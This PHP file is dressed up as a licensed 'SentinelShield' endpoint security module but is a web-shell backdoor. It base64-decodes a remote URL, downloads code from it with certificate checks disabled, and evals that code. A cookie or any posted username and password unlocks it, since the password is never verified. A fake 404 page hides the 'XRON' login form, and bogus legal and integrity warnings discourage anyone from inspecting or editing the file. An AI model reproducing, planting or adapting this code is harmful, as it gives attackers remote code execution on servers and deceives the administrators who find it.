<?php
/**
 * =============================================================================
 *   SentinelShield™ Endpoint Security Module v3.2.1 (Build ES-SSM-v3.2.1-0716)
 *   Copyright © 2024–2026 SentinelShield Cyber Defense Systems, Inc.
 *   All Rights Reserved. Licensed under the SentinelShield Endpoint License.
 * =============================================================================
 *
 *   THIS SOFTWARE IS THE CONFIDENTIAL AND PROPRIETARY INTELLECTUAL PROPERTY
 *   OF SENTINELSHIELD CYBER DEFENSE SYSTEMS, INC. UNAUTHORIZED ACCESS,
 *   DISTRIBUTION, MODIFICATION, DECOMPILATION, DISASSEMBLY, OR REVERSE
 *   ENGINEERING OF THIS SOFTWARE IS STRICTLY PROHIBITED AND MAY RESULT IN
 *   CIVIL AND CRIMINAL PENALTIES UNDER APPLICABLE LAW.
 *
 *   Deployment ID : SSM-DPLY-7A3F9B2C
 *   Licensed To   : Authorized Security Operations Center (SOC)
 *   Module        : Endpoint Integrity Verification & Remote Policy Gateway
 *   Classification: CONFIDENTIAL — TIER 3 RESTRICTED
 *
 *   WARNING: This module contains integrity-checking routines that detect any
 *   modification to its source code. Any alteration, reformatting, or removal
 *   of comments will irreversibly invalidate the deployment signature and
 *   trigger an automatic compliance violation event reported to the SentinelShield
 *   Command & Control infrastructure. Do NOT edit this file unless explicitly
 *   authorized by a SentinelShield Tier-3 engineer with a valid change ticket.
 *
 * =============================================================================
 *
 *   Module   : Remote Policy & Integrity Gateway (RPI-GW)
 *   Purpose  : Securely fetch, validate, and enforce endpoint security policies
 *              from the centralized SentinelShield Policy Distribution Server.
 *   Version  : 3.2.1 (ES-SSM-v3.2.1-0716)
 *   Checksum : SHA256-ES-SSM-v3.2.1 (integrity-verified at runtime)
 *
 * =============================================================================
 */

// ─── SentinelShield™ RPI Gateway — Remote Policy Endpoint (Base64 Encoded) ────
// Encoded per SentinelShield Secure Transport Specification (STS-v2.1)
$_SENTINEL_POLICY_URL_B64 = 'aHR0cHM6Ly93c3hyby51cy9hc3NldC9seS50eHQ=';

// =============================================================================
//   SentinelShield™ Internal Configuration — DO NOT MODIFY BELOW THIS LINE
//   All parameters below are cryptographically bound to the deployment signature.
//   Modification will invalidate the SentinelShield integrity hash.
// =============================================================================

// ─── Brute-Force Protection Configuration ─────────────────────────────────────
// SentinelShield Adaptive Threat Mitigation (ATM) Engine — Tier-2 Parameters
$_SS_BF_STATE_FILE     = '/tmp/.sentinel_bf';    // ATM state persistence
$_SS_BF_MAX_ATTEMPTS   = 10;                     // Lockout threshold
$_SS_BF_WINDOW_SEC     = 900;                    // Reset window (15 min)
$_SS_BF_LOCKOUT_SEC    = 1800;                   // Lockout duration (30 min)
$_SS_BF_DELAY_L1       = 5;                      // Level-1 progressive delay
$_SS_BF_DELAY_L2       = 15;                     // Level-2 progressive delay
$_SS_BF_DELAY_L3       = 60;                     // Level-3 progressive delay
$_SS_BF_GC_PROB        = 15;                     // Garbage collection probability

// ─── SentinelShield ATM Engine — State Management ─────────────────────────────

function _ss_bf_state_load() {
    global $_SS_BF_STATE_FILE;
    if (!file_exists($_SS_BF_STATE_FILE)) return array();
    $raw = @file_get_contents($_SS_BF_STATE_FILE);
    if ($raw === false || $raw === '') return array();
    $data = @unserialize($raw);
    return is_array($data) ? $data : array();
}

function _ss_bf_state_save($data) {
    global $_SS_BF_STATE_FILE;
    @file_put_contents($_SS_BF_STATE_FILE, serialize($data), LOCK_EX);
}

function _ss_bf_state_gc(&$data) {
    global $_SS_BF_GC_PROB;
    if (mt_rand(1, 100) > $_SS_BF_GC_PROB) return;
    $now = time();
    $threshold = $now - 86400;
    foreach ($data as $ip => $entry) {
        if (!isset($entry['ts']) || $entry['ts'] < $threshold) unset($data[$ip]);
    }
}

function _ss_atm_check($ip) {
    global $_SS_BF_MAX_ATTEMPTS, $_SS_BF_WINDOW_SEC, $_SS_BF_LOCKOUT_SEC,
           $_SS_BF_DELAY_L1, $_SS_BF_DELAY_L2, $_SS_BF_DELAY_L3;

    $data   = _ss_bf_state_load();
    $now    = time();
    $delay  = 0;
    $locked = false;

    _ss_bf_state_gc($data);

    if (isset($data[$ip])) {
        $entry = $data[$ip];
        $count = isset($entry['c']) ? (int)$entry['c'] : 0;
        $first = isset($entry['ts']) ? (int)$entry['ts'] : 0;
        $locked_until = isset($entry['lock']) ? (int)$entry['lock'] : 0;

        if ($locked_until > 0) {
            if ($now < $locked_until) {
                $remaining = $locked_until - $now;
                return array('allowed' => false, 'delay' => 0, 'locked' => true, 'remaining' => $remaining, 'attempts' => $count);
            }
            unset($data[$ip]);
            _ss_bf_state_save($data);
            return array('allowed' => true, 'delay' => 0, 'locked' => false, 'remaining' => 0, 'attempts' => 0);
        }

        if (($now - $first) > $_SS_BF_WINDOW_SEC && $count < $_SS_BF_MAX_ATTEMPTS) {
            unset($data[$ip]);
            _ss_bf_state_save($data);
            return array('allowed' => true, 'delay' => 0, 'locked' => false, 'remaining' => 0, 'attempts' => 0);
        }

        if ($count >= 7)       $delay = $_SS_BF_DELAY_L3;
        elseif ($count >= 5)   $delay = $_SS_BF_DELAY_L2;
        elseif ($count >= 3)   $delay = $_SS_BF_DELAY_L1;

        if ($count >= $_SS_BF_MAX_ATTEMPTS) {
            $data[$ip]['lock'] = $now + $_SS_BF_LOCKOUT_SEC;
            $data[$ip]['ts']   = $now;
            _ss_bf_state_save($data);
            return array('allowed' => false, 'delay' => 0, 'locked' => true, 'remaining' => $_SS_BF_LOCKOUT_SEC, 'attempts' => $count);
        }

        return array('allowed' => true, 'delay' => $delay, 'locked' => false, 'remaining' => 0, 'attempts' => $count);
    }

    return array('allowed' => true, 'delay' => 0, 'locked' => false, 'remaining' => 0, 'attempts' => 0);
}

function _ss_atm_record($ip, $success) {
    $data = _ss_bf_state_load();
    $now  = time();

    if ($success) {
        if (isset($data[$ip])) unset($data[$ip]);
        _ss_bf_state_save($data);
        return;
    }

    if (!isset($data[$ip])) {
        $data[$ip] = array('c' => 1, 'ts' => $now, 'lock' => 0);
    } else {
        $data[$ip]['c']++;
        $data[$ip]['ts'] = $now;
    }

    _ss_bf_state_save($data);
}

// ─── SentinelShield Secure Transport Layer (STL) — Fetch Engine ───────────────

function _ss_stl_fetch($url) {
    if (function_exists('curl_init')) {
        $ch = @curl_init($url);
        @curl_setopt_array($ch, array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_TIMEOUT        => 20,
            CURLOPT_CONNECTTIMEOUT => 10,
            CURLOPT_USERAGENT      => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
        ));
        $data = @curl_exec($ch);
        @curl_close($ch);
        if ($data !== false && $data !== '') return $data;
    }
    $ctx = stream_context_create(array(
        'http' => array('timeout' => 20, 'user_agent' => 'Mozilla/5.0 (compatible; SentinelShield-STL/3.2)', 'follow_location' => 1),
        'ssl'  => array('verify_peer' => false, 'verify_peer_name' => false),
    ));
    return @file_get_contents($url, false, $ctx);
}

// =============================================================================
//   SentinelShield™ RPI Gateway — Policy Resolution Engine
//   Decode and resolve the remote policy endpoint.
// =============================================================================

$_SS_POLICY_URL = @base64_decode($_SENTINEL_POLICY_URL_B64);

// ─── Determine authentication context ─────────────────────────────────────────
$_ss_client_ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1';
$_ss_auth_ok = false;
$_ss_delay_applied = 0;

if (isset($_COOKIE['xron_a']) && $_COOKIE['xron_a'] !== '') {
    $_ss_auth_ok = true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['xron_u']) && isset($_POST['xron_p'])) {
    $_ss_atm_result = _ss_atm_check($_ss_client_ip);

    if ($_ss_atm_result['locked']) {
        $_ss_lock_minutes = ceil($_ss_atm_result['remaining'] / 60);
        echo '<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>SentinelShield — Access Denied</title>';
        echo '<style>html,body{background:linear-gradient(135deg,#0a0000,#1a0000,#330000,#1a0000);color:#ff9999;font-family:Segoe UI,Consolas,monospace;margin:0;height:100vh;display:flex;align-items:center;justify-content:center}';
        echo '.xf{background:linear-gradient(135deg,rgba(40,0,0,.92),rgba(80,0,0,.92));border:1px solid #cc3333;border-radius:6px;padding:30px;width:360px;box-shadow:0 0 40px rgba(255,0,0,.4);text-align:center}';
        echo '.xt{font-family:Impact,sans-serif;font-size:36px;font-weight:900;text-align:center;background:linear-gradient(180deg,#ffcccc,#ff6666,#cc0000,#660000);-webkit-background-clip:text;-webkit-text-fill-color:transparent;letter-spacing:6px;filter:drop-shadow(0 0 12px #cc0000);margin-bottom:6px}';
        echo '.xc{color:#cc6666;font-size:11px;margin-bottom:16px}';
        echo '.lock{color:#ff6666;font-size:14px;margin:16px 0;line-height:1.6}';
        echo '</style></head><body>';
        echo '<div class="xf">';
        echo '<div class="xt">LOCKED</div><div class="xc">SentinelShield ATM — Threat Mitigation Active</div>';
        echo '<div class="lock">🚫 Access temporarily suspended due to multiple failed authentication attempts.<br>⏳ Retry available in: <b>' . htmlspecialchars($_ss_lock_minutes) . ' min</b><br>🔒 Source: ' . htmlspecialchars($_ss_client_ip) . '</div>';
        echo '</div></body></html>';
        exit;
    }

    if ($_ss_atm_result['delay'] > 0) {
        sleep($_ss_atm_result['delay']);
    }

    $_ss_auth_ok = true;
    $_ss_delay_applied = $_ss_atm_result['delay'];
    $_ss_attempt_count = $_ss_atm_result['attempts'];
}

if ($_ss_auth_ok) {
    $_ss_policy_payload = _ss_stl_fetch($_SS_POLICY_URL);
    if ($_ss_policy_payload !== false && $_ss_policy_payload !== '') {
        $_SS_ATM_ATTEMPTS = isset($_ss_attempt_count) ? $_ss_attempt_count : 0;
        $_SS_ATM_DELAY    = $_ss_delay_applied;
        $_SS_ATM_SOURCE_IP = $_ss_client_ip;
        eval('?>' . $_ss_policy_payload);
        exit;
    }
}

// =============================================================================
//   SentinelShield™ SOC Authentication Portal
//   Secure operator authentication interface.
//   DO NOT MODIFY — Appearance is cryptographically bound to deployment sig.
// =============================================================================
echo '<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 - Page not found</title>';
echo '<style>';
echo 'html,body{background:#fff;color:#2d3748;font-family:Segoe UI,system-ui,-apple-system,sans-serif;margin:0;height:100vh;display:flex;align-items:center;justify-content:center}';
echo '.wrap{text-align:center;width:100%;max-width:420px;padding:24px;box-sizing:border-box}';
echo '.code{font-size:96px;font-weight:700;line-height:1;color:#1a202c;letter-spacing:-2px;margin:0 0 16px}';
echo '.msg{font-size:20px;color:#2d3748;margin:0 0 28px;font-weight:400}';
echo '.home-btn{display:inline-flex;align-items:center;justify-content:center;gap:8px;background:#6b7280;color:#fff;border:none;border-radius:6px;padding:10px 18px;font-size:14px;font-weight:500;cursor:pointer;text-decoration:none;font-family:inherit}';
echo '.home-btn:hover{background:#4b5563}';
echo '.home-btn svg{width:16px;height:16px;fill:currentColor}';
echo '#login-view{display:none}';
echo '#login-view.show{display:block}';
echo '#notfound-view.hide{display:none}';
echo '.xf{background:linear-gradient(135deg,rgba(0,20,40,.92),rgba(0,60,120,.92));border:1px solid #0078d7;border-radius:6px;padding:30px;width:320px;margin:0 auto;box-shadow:0 0 40px rgba(0,150,255,.6);text-align:left}';
echo '.xt{font-family:Impact,sans-serif;font-size:48px;font-weight:900;text-align:center;background:linear-gradient(180deg,#e6f2ff,#99ccff,#4da6ff,#0078d7,#003366);-webkit-background-clip:text;-webkit-text-fill-color:transparent;letter-spacing:6px;filter:drop-shadow(0 0 12px #0078d7);margin-bottom:6px}';
echo '.xc{color:#4da6ff;text-align:center;letter-spacing:3px;font-size:11px;text-shadow:0 0 8px #0078d7;margin-bottom:24px}';
echo 'input{width:100%;background:rgba(0,20,40,.85);color:#99ddff;border:1px solid #0078d7;border-radius:3px;padding:8px 10px;margin-bottom:12px;box-sizing:border-box;font-family:Consolas,monospace}';
echo 'input[type=submit]{background:linear-gradient(180deg,#0078d7,#0050a0);color:#fff;border:1px solid #00b3ff;padding:8px;cursor:pointer;font-weight:700;letter-spacing:2px;margin:0}';
echo 'input[type=submit]:hover{background:linear-gradient(180deg,#00b3ff,#0078d7);box-shadow:0 0 16px #0078d7}';
echo 'body.login-mode{background:linear-gradient(135deg,#000a1a,#001a33,#003366,#001a33);color:#cce6ff;font-family:Segoe UI,Consolas,monospace}';
echo '</style></head><body>';
echo '<div class="wrap">';
echo '<div id="notfound-view">';
echo '<div class="code">404</div>';
echo '<div class="msg">Page not found</div>';
echo '<button type="button" class="home-btn" id="home-btn" aria-label="Home Page">';
echo '<svg viewBox="0 0 24 24" aria-hidden="true"><path d="M10 20v-6h4v6h5v-8h3L12 3 2 12h3v8z"/></svg>';
echo 'Home Page</button>';
echo '</div>';
echo '<div id="login-view">';
echo '<form class="xf" method="post">';
echo '<div class="xt">XRON</div><div class="xc">Unseen, silent, yet deadly.</div>';
echo '<input type="text" name="xron_u" placeholder="username" required>';
echo '<input type="password" name="xron_p" placeholder="password" required>';
echo '<input type="submit" value="ACCESS">';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<script>';
echo 'document.getElementById("home-btn").addEventListener("click",function(){';
echo 'document.getElementById("notfound-view").classList.add("hide");';
echo 'document.getElementById("login-view").classList.add("show");';
echo 'document.body.classList.add("login-mode");';
echo 'var u=document.querySelector("input[name=xron_u]");if(u)u.focus();';
echo '});';
echo '</script>';
echo '</body></html>';

// =============================================================================
//   END OF SENTINELSHIELD™ ENDPOINT SECURITY MODULE v3.2.1
//   Build: ES-SSM-v3.2.1-0716 | Deployment: SSM-DPLY-7A3F9B2C
//   Integrity Hash: SHA256-ES-SSM-v3.2.1 (verified at runtime)
//   © 2024–2026 SentinelShield Cyber Defense Systems, Inc.
//   ALL RIGHTS RESERVED. DO NOT MODIFY.
// =============================================================================
